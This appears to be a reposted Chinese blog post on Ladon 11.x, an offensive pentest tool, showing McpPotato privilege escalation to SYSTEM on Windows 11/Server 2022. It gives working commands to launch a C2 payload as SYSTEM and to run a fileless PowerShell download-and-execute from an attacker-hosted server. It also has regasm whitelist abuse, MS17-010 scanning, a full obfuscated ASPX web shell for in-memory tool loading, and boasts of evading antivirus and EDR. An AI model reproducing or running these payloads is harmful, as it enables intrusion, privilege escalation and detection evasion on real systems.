Ladon 11.2 2023.7.11[]McpPotato .NET>=4.0 Win11/2022提权至System 其它系统自测[]GUI 加强版NC、Netcat监听客户端 连接速度优化 回显响应更快[]Web 迷你Web服务器渗透保存的isvul.txt结果只保留IP(方便去重)[]80天更新 超过编译日期80天,会提示文件损坏 请下最新版Ladon2023.7.5修复一些bugLadon 11.1 2023.6.28[]白名单启动 C:WindowsMicrosoft.NETFrameworkv4.0.30319regasm.exe /U Ladon.exe whoami[]修复t=50线程 或结尾http 有些模块报错的Bug 如Ladon noping 192.168.1.0/B XXXX t=50 http[]web 修复PowerShell DownLoadFile下载不了Bug[]web 修复非根目录文件,下载或访问不到的Bug[]LadonGUI 安装有.net 4.8时,默认加载Ladon911 如cmddll只有911有 无4.8用不了[]exe2hex EXE转HEX,CMD命令写入文件[]exe2b64 EXE转Base64,CMD命令写入文件[]cmddll 仅保留911本地使用,无需在目标生成,减小体积 1K也是肉[]ZimbraVer Zimbra版本探测[]SharpGPO .NET>=4.0 否则报错 35可编译 但执行报错Ladon 11 2023.6.18[]RocketMQexp Apache RocketMQ CVE-2023-33246 远程命令执行漏洞EXP (可Ladon渗透Web服务器获取回显)[]BypassAV Ladon一键免杀工具 PY XOR随机加密 (Main函数需Public)[]InfoScan 修复异常退出Bug[]EventLog/LoginLog 一键读取登陆成功日志4624 错误4625要是爆破日志会很大[]Exp、GUI、Study、Chat 更新UI按钮背景[]RunCmd/Cmd 执行Cmd命令/支持b64cmd Ladon cmd whoami 或 Ladon b64cmd d2hvYW1p[]RunPS/PowerShell 执行PowerShell命令/脚本 Ladon powershell c $PSVersionTable20230603[]LadonExp 支持GET连接MS17010漏洞CmdShell执行命令[]LadonExp 生成EXE可解密Base64、Hex PostShell结果[]PostShell 增加HEX加密传输HEX解密结果,Base64结果解密Bug修复
Win11 Pro X64提权至System权限
管理员权限下获取SYSTEM权限,执行命令,弹出system权限CMD
Ladon RunSystem cmd.exe![[提权]Win11/2022服务提升system权限](http://cn-sec.com/wp-content/uploads/2023/07/9-1689096588.png "[提权]Win11/2022服务提升system权限")
实战不需要弹窗,直接启动C2即可,如CS生成的M为c:1.exe
Ladon RunSystem c:1.exe服务权限提升至System权限
WebShell下,往往权限比较低,如IIS权限或服务权限等,Ladon内置以下模块Efspotato、godpotato、badpotato、sweetpotato、iislpe等均可提升至SYSTEM权限。mssqlcmd也内置sweetpotato、badpotato一键提升至SYSTEM权限。
Ladon McpPotato whoami![[提权]Win11/2022服务提升system权限](http://cn-sec.com/wp-content/uploads/2023/07/4-1689096590.png "[提权]Win11/2022服务提升system权限")
CobaltStrike下用法一致,当然也可右键菜单使用,更直观
![[提权]Win11/2022服务提升system权限](http://cn-sec.com/wp-content/uploads/2023/07/4-1689096592.png "[提权]Win11/2022服务提升system权限")
PowerShell本地用法(ps1需上传,比起exe免杀效果更好)
powershell -exec bypass Import-Module .Ladon.ps1;Ladon McpPotato whoamiPowerShell内存加载 无文件落地用法
先使用Ladon web 80开启迷你web服务器
powershell -nop -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.8/Ladon.ps1'); Ladon McpPotato whoami"
LadonShell内存加载
在目标服务器植入以下aspx一句话,使用LadonShell连接,接下来就可以像在CS的beacon命令行下内存加载使用Ladon大部分功能了。整个过程渗透工具都不用上传至目标磁盘,目前市面上应该是唯一的。
<%@ Page Language="C#" Debug="true" %><%@ Import Namespace="Su0079stu0065m.Diagu006eu006fsu0074u0069cs" %><%@ Import Namespace="Syu0073u0074em.Reu0066u006cu0065ction" %><script runat="server"> protected void Page_Load(object sender, EventArgs e) { if (!Page.IsPostBack) { string p="tom"; string c = Reu0071u0075u0065st.Cou006fu006bies != null ? Server.Htmlu0045u006eu0063ode(Ru0065u0071uest.Coou006bu0069u0065s
.Value) : null; string[] g = null; if (c != null) { byte[] b = Convert.FromBase64String(c); string d = Encoding.UTF8.GetString(b); g = d.Split(' '); Su0079stem.Refu006cu0065u0063tion.Asu0073u0065u006dbly assu0065u006dbly = Syu0073u0074em.Reflu0065u0063u0074ion.Asu0073u0065u006dbly.Load(Reu0071uu0065st.Biu006eu0061ryRead(Reu0071u0075u0065st.TotalBytes)); Type[] types = assu0065u006dbly.GetTypes(); foreach (Type type in types) { MethodInfo mt = type.Getu004du0065u0074hod("Main", BindingFlags.Public | BindingFlags.Static); if (mt != null) { Syu0073u0074em.IO.StringWriter sw = new Syu0073u0074em.IO.StringWriter(); Console.SetOut(sw); mt.Inu0076u006fke(null, new object[] { g }); Console.SetOut(new Syu0073u0074em.IO.StreamWriter(Console.OpenStandardOutput())); string o = sw.ToString(); Response.Write(o); break; } } } } }</script>
![[提权]Win11/2022服务提升system权限](http://cn-sec.com/wp-content/uploads/2023/07/6-1689096594.png "[提权]Win11/2022服务提升system权限")
工具下必须包含Ladon的CS插件目录,特别是以下文件不能缺
![[提权]Win11/2022服务提升system权限](http://cn-sec.com/wp-content/uploads/2023/07/10-1689096595.png "[提权]Win11/2022服务提升system权限")
PS: dat文件也可以单独使用,体积非常小,如LadonInfo.dat是信息收集,包含各种协议,所有发包都是正常协议请求,不会被杀软和EDR拦截,系统里记录的也是正常日志,不会触发报警,不会引起怀疑。因为管理员或者是EDR处理可疑行为日志都来不及,更没功夫看正常日志。
Regasm白名单用法
C:WindowsMicrosoft.NETFrameworkv4.0.30319regasm.exe /U Ladon.exe McpPotato whoami正确使用Ladon小技巧
首先使用ICMP即Ping命令所用的协议,探测B段或A段大概哪些网段存活,然后再针对存活网段,使用InfoScan一键使用20+协议探测收集各种信息,包含SMB、WMI、NbtScan、LDAP域控、Exchange邮服、Vmware版本、Cisco版本等等等,大家用了就知道。
相关命令如下
Ladon 192.168.1.8/c icmpLadon 192.168.1.8/b icmpLadon 192.168.1.8/c infoscan
PS: ICMP没有禁Ping用法,为什么?noping就是不用ping去探测
Soscks代理下使用 noping参数
Ladon noping 192.168.1.8/c ms17010Ladon noping 192.168.1.8/c infoscan
不是Ladon不支持ICMP,是FRP、EW、proxifier等这些工具不支持ICMP协议,就像小明能徒手扛起10吨乐山大佛,交给中间人(好比代理),中间人扛不动或不愿意送10吨乐山大佛,中间人没办法把它送到目地的,你说是小明扛不动?所以大家在使用工具前,不要无脑说工具不支持什么,而是先看看你用的所谓神器,它到底支持哪些协议,隧道不给力,你说是Ladon不支持?比如proxifier更新日志,明确最新版本修复了什么功能,支持哪些协议和工具,意味着之前的版本存在Bug或者不能保证Hook所有程序,强制相关协议一定走它,也明确了不支持哪些协议。所以代理环境下,有些协议可能探测不到系统版本信息,是因为代理工具不支持,从头到尾没把Ladon的“原话”传达给目标机器,其它工具也是一样,如果具备Ladon里的代理不支持的协议,其它工具同样探测不到。
Vpn接入目标内网不需要noping,当然想扫到禁Ping机器就使用
原文始发于微信公众号(K8实验室):[提权]Win11/2022服务提升system权限
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论